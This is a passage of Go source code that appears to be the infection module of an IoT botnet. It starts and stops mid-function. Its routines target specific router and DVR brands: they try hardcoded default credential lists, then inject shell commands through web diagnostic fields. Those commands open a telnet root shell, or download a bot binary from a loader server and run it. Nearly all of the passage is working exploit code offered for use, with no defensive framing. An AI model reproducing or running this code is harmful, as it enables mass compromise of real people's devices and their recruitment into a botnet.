ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "<status>success</status>") {
|
||
fmt.Printf("\x1b[38;5;46mTvt\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
|
||
payloadSent++
|
||
break
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
time.Sleep(10 * time.Second)
|
||
}
|
||
|
||
func infectFunctionFiberhome(target string) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
authed int = 0
|
||
telnetPort int = 0
|
||
)
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("POST /goform/webLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 23\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/login_inter.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nUser=admin&Passwd=admin\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") {
|
||
authed = 1
|
||
break
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
|
||
if authed == 0 {
|
||
return
|
||
}
|
||
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /menu_inter.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://" + target + "/login_inter.asp\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
|
||
if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") {
|
||
authed = 1
|
||
break
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
|
||
if fiberRandPort == 1 {
|
||
rand.Seed(time.Now().UnixNano())
|
||
telnetPort = rand.Intn(50000) + 10000
|
||
} else {
|
||
telnetPort = fiberStaticPort
|
||
}
|
||
|
||
for i := 0; i < len(fiberSecStrs); i++ {
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /goform/setPing?ping_ip=;telnetd%20-l/bin/sh%20-p" + strconv.Itoa(telnetPort) + "&requestNum=" + strconv.Itoa(i + 1) + "&diagtype=1&" + fiberSecStrs[i] + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
break
|
||
}
|
||
|
||
conn.Close()
|
||
|
||
if !strings.Contains(string(rdbuf), "200 OK") {
|
||
return
|
||
}
|
||
}
|
||
|
||
time.Sleep(3 * time.Second)
|
||
|
||
ipslit := strings.Split(target, ":")
|
||
conn, err = net.DialTimeout("tcp", ipslit[0] + ":" + strconv.Itoa(telnetPort), 10 * time.Second)
|
||
if err == nil {
|
||
fmt.Printf("\x1b[38;5;46mFiberhome\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m telnet shell opened\x1b[38;5;15m\r\n", target)
|
||
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderFiberhomeTag)
|
||
conn.Close()
|
||
}
|
||
|
||
return
|
||
}
|
||
|
||
func infectFunctionVigor(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
payload := "action=login&keyPath=%27%0A%09%2F"
|
||
payload += vigorPayload
|
||
payload += "%27%0A%09%27&loginPwd=a&loginUser=a"
|
||
cntlen := strconv.Itoa(len(payload))
|
||
|
||
conn.Write([]byte("POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n" + payload + "\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") {
|
||
fmt.Printf("\x1b[38;5;46mVigor\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
|
||
payloadSent++
|
||
break
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionComtrend(target string) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
state = 0
|
||
sessionKey = "null"
|
||
)
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /pingview.cmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/left.html\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "&sessionKey=") && strings.Contains(string(rdbuf), "var code = 'location=") && state != 1 {
|
||
sessionKey = getStringInBetween(string(rdbuf), " loc += '&sessionKey=", "';\n}\n\nvar code = 'location=\"' + loc + '\"';\n")
|
||
|
||
if sessionKey == "null" {
|
||
break
|
||
}
|
||
|
||
conn.Close()
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /ping.cgi?pingIpAddress=;cd%20/mnt;wget%20http://" + loaderDownloadServer + "/multi/wget.sh%20-O-%20>sfs;chmod%20777%20sfs;sh%20sfs%20" + loaderComtrendTag + ";&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/ping.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
|
||
state = 1
|
||
} else if state == 1 {
|
||
if strings.Contains(string(rdbuf), "function btnPing()") {
|
||
fmt.Printf("\x1b[38;5;46mComtrend\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
|
||
payloadSent++
|
||
conn.Close()
|
||
return
|
||
}
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionGponFiber(target string) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
logins []string = []string{"user:user", "adminisp:adminisp", "admin:stdONU101"}
|
||
stage = 0
|
||
)
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
for i := 0; i < len(logins); i++ {
|
||
loginSplit := strings.Split(logins[i], ":")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
cntlen := 14
|
||
cntlen = len(loginSplit[0])
|
||
cntlen = len(loginSplit[1])
|
||
|
||
conn.Write([]byte("POST /boaform/admin/formLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + strconv.Itoa(cntlen) + "\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/admin/login.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nusername=" + loginSplit[0] + "&psd=" + loginSplit[1] + "\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "ERROR:bad password!") {
|
||
zeroByte(rdbuf)
|
||
break
|
||
} else if (strings.Contains(string(rdbuf), "HTTP/1.0 302 Moved Temporarily") || strings.Contains(string(rdbuf), "ERROR:you have logined!")) && stage != 1{
|
||
conn.Close()
|
||
conn, err := net.DialTimeout("tcp", target, 60 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
payload := "target_addr=%3Brm%20-rf%20/var/tmp/stainfo%3Bwget%20http://" + loaderDownloadServer + loaderBinsLocation + "bot.mips%20-O%20->/var/tmp/stainfo%3Bchmod%20777%20/var/tmp/stainfo%3B/var/tmp/stainfo%20" + loaderGponfiberTag + "&waninf=1_INTERNET_R_VID_"
|
||
cntlen := strconv.Itoa(len(payload))
|
||
|
||
conn.Write([]byte("POST /boaform/admin/formTracert HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nConnection: close\r\nReferer: http://" + target + "/diag_tracert_admin_en.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
|
||
stage = 1
|
||
zeroByte(rdbuf)
|
||
continue
|
||
} else if stage == 1 {
|
||
if strings.Contains(string(rdbuf), "value=\" OK \"") {
|
||
fmt.Printf("\x1b[38;5;46mGponFiber\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, loginSplit[0], loginSplit[1])
|
||
conn.Close()
|
||
payloadSent++
|
||
return
|
||
}
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
}
|
||
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionBroadcomSessionKey(target string, auth string) string {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return ""
|
||
}
|
||
|
||
defer conn.Close()
|
||
conn.Write([]byte("GET /ping.html HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + auth + "\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/menu.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
|
||
|
||
for {
|
||
bytebuf := make([]byte, 256)
|
||
rdlen, err := conn.Read(bytebuf)
|
||
if err != nil || rdlen <= 0 {
|
||
return ""
|
||
}
|
||
|
||
if strings.Contains(string(bytebuf), "pingHost.cmd") && strings.Contains(string(bytebuf), "&sessionKey=") {
|
||
index1 := strings.Index(string(bytebuf), "&sessionKey=")
|
||
index2 := strings.Index(string(bytebuf)[index1+len("&sessionKey="):], "';")
|
||
sessionKey := string(bytebuf)[index1+len("&sessionKey="):index1+len("&sessionKey=")+index2]
|
||
return sessionKey
|
||
}
|
||
}
|
||
|
||
return ""
|
||
}
|
||
|
||
func infectFunctionBroadcom(target string) {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nCache-Control: max-age=0\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
|
||
|
||
bytebuf := make([]byte, 64)
|
||
rdlen, err := conn.Read(bytebuf)
|
||
if err != nil || rdlen <= 0 {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
conn.Close()
|
||
|
||
if !strings.Contains(string(bytebuf), "HTTP/1.1 200 Ok\r\nServer: micro_httpd") {
|
||
return
|
||
}
|
||
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
sessionKey := infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
|
||
conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=" + broadcomPayload + "&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
|
||
|
||
bytebuf = make([]byte, 256)
|
||
rdlen, err = conn.Read(bytebuf)
|
||
if err != nil || rdlen <= 0 {
|
||
return
|
||
}
|
||
|
||
conn.Close()
|
||
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
|
||
conn.Write([]byte("GET /pingHost.cmd?action=add&targetHostAddress=;ps|sh&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/ping.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
|
||
|
||
bytebuf = make([]byte, 256)
|
||
rdlen, err = conn.Read(bytebuf)
|
||
if err != nil || rdlen <= 0 {
|
||
return
|
||
}
|
||
|
||
conn.Close()
|
||
|
||
if !strings.Contains(string(bytebuf), "COMPLETED") {
|
||
fmt.Printf("\x1b[38;5;46mBroadcom\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, "support", "support")
|
||
return
|
||
}
|
||
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0")
|
||
conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=time.nist.gov&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n"))
|
||
|
||
bytebuf = make([]byte, 256)
|
||
rdlen, err = conn.Read(bytebuf)
|
||
if err != nil || rdlen <= 0 {
|
||
return
|
||
}
|
||
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionHongdian(target string) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"}
|
||
)
|
||
|
||
for i := 0; i < len(logins); i++ {
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
|
||
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") {
|
||
conn.Close()
|
||
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
payload := "op_type=ping&destination=%3B"
|
||
payload += hongdianPayload
|
||
payload += "&user_options="
|
||
cntlen := strconv.Itoa(len(payload))
|
||
|
||
conn.Write([]byte("POST /tools.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/tools.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
|
||
zeroByte(rdbuf)
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") && strings.Contains(string(rdbuf), "/themes/oem.css") {
|
||
fmt.Printf("\x1b[38;5;46mHongdian\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
|
||
conn.Close()
|
||
payloadSent++
|
||
return
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
return
|
||
} else if strings.Contains(string(rdbuf), "HTTP/1.1 401 Unauthorized") {
|
||
break
|
||
}
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
}
|
||
|
||
func infectFunctionRealtek(target string) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"}
|
||
)
|
||
|
||
for i := 0; i < len(logins); i++ {
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
|
||
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "HTTP/1.1 200") {
|
||
conn.Close()
|
||
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
payload := "submit-url=%2Fsyscmd.htm&sysCmd=ping&sysMagic=&sysCmdType=ping&checkNum=1&sysHost=%3Btelnetd%20-l/bin/sh%20-p31443&apply=Apply&msg=boa.conf%0D%0Amime.types%0D%0A"
|
||
cntlen := strconv.Itoa(len(payload))
|
||
|
||
conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/syscmd.htm\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n"))
|
||
zeroByte(rdbuf)
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "Redirect") && strings.Contains(string(rdbuf), "/syscmd.htm") {
|
||
time.Sleep(10 * time.Second)
|
||
|
||
ipslit := strings.Split(target, ":")
|
||
tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":31443", 10 * time.Second)
|
||
if err == nil {
|
||
fmt.Printf("\x1b[38;5;46mRealtek\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
|
||
tmpconn.Close()
|
||
}
|
||
|
||
conn.Close()
|
||
payloadSent++
|
||
return
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
return
|
||
} else if strings.Contains(string(rdbuf), "HTTP/1.1 401") {
|
||
break
|
||
}
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
}
|
||
|
||
func infectFunctionTenda(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /goform/setUsbUnload/.js?deviceName=A;" + tendaPayload + " HTTP/1.1\r\nHost: " + target + "\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "HTTP/1.0 200 OK") && strings.Contains(string(rdbuf), "{\"errCode\":0}") {
|
||
fmt.Printf("\x1b[38;5;46mTenda\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
|
||
payloadSent++
|
||
break
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionTotolink(target string) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
logins []string = []string{"admin:admin", "admin:Soportehfc", "Soportehfc:Soportehfc", "admin:soportehfc", "soportehfc:soportehfc"}
|
||
)
|
||
|
||
for i := 0; i < len(logins); i++ {
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
authStr := base64.StdEncoding.EncodeToString([]byte(logins[i]))
|
||
payload := "submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd="
|
||
payload += totolinkPayload
|
||
cntlen := strconv.Itoa(len(payload))
|
||
|
||
conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + authStr + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n" + payload + "\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "Location: http://" + target + "/syscmd.htm") {
|
||
fmt.Printf("\x1b[38;5;46mTotolink\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i])
|
||
payloadSent++
|
||
break
|
||
}
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
}
|
||
|
||
func infectFunctionZyxel(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3B" + zyxelPayload + "+%23&password=asdf HTTP/1.1\r\nHost: " + target + "\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozila/5.0\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "errcode:5") {
|
||
fmt.Printf("\x1b[38;5;46mZyxel\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
|
||
payloadSent++
|
||
break
|
||
}
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionAlcatel(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /cgi-bin/masterCGI?ping=nomip&user=;" + alcatelPayload + "; HTTP/1.1\r\nHost: " + target + "\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionLilinDvr(target string) {
|
||
|
||
var authPos int = -1
|
||
var pathPos int = -1
|
||
var logins = [...]string{"root:icatch99", "report:8Jg0SR8K50", "report:report", "root:root", "admin:admin", "admin:123456", "admin:654321", "admin:1111", "admin:admin123", "admin:1234", "admin:12345"}
|
||
var paths = [...]string{"/dvr/cmd", "/cn/cmd"}
|
||
|
||
for i := 0; i < len(logins); i++ {
|
||
logins[i] = base64.StdEncoding.EncodeToString([]byte(logins[i]))
|
||
}
|
||
|
||
cntLen := 292
|
||
cntLen += len(lilinPayload)
|
||
cntLenString := strconv.Itoa(cntLen)
|
||
bytebuf := make([]byte, 512)
|
||
|
||
for i := 0; i < len(logins); i++ {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
